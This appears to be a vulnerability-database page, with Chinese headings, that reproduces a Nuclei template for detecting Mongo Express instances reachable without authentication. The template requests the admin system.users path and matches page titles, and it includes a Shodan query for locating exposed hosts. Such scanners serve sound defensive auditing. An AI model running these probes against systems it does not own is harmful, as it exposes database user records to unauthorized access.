漏洞描述
Mongo Express was able to be access with no authentication requirements in place.
unauthenticated-mongo-express: Mongo Express - Unauthenticated Access
PoC代码[已公开]
id: unauthenticated-mongo-express
info:
name: Mongo Express - Unauthenticated Access
author: dhiyaneshDK,b0rn2r00t
severity: high
description: Mongo Express was able to be access with no authentication requirements in place.
reference:
- https://www.exploit-db.com/ghdb/5684
classification:
cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: mongo-express_project
product: mongo-express
shodan-query: title:"Home - Mongo Express"
tags: mongo,unauth,edb,misconfig,vuln
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/mongo-express/'
- '{{BaseURL}}/db/admin/system.users'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Home - Mongo Express</title>'
- '<title>system.users - Mongo Express</title>'
condition: or
- type: status
status:
- 200
# digest: 4b0a00483046022100f15640d2da262480d2d8e325c9b2791e2b3fde38663bf3e702bb12be475884cb0221009e10ac2f9e8b86d59c682d089058fec2b05522d051db93b432d4dfba04febda4:922c64590222798bb761d5b6d8e72950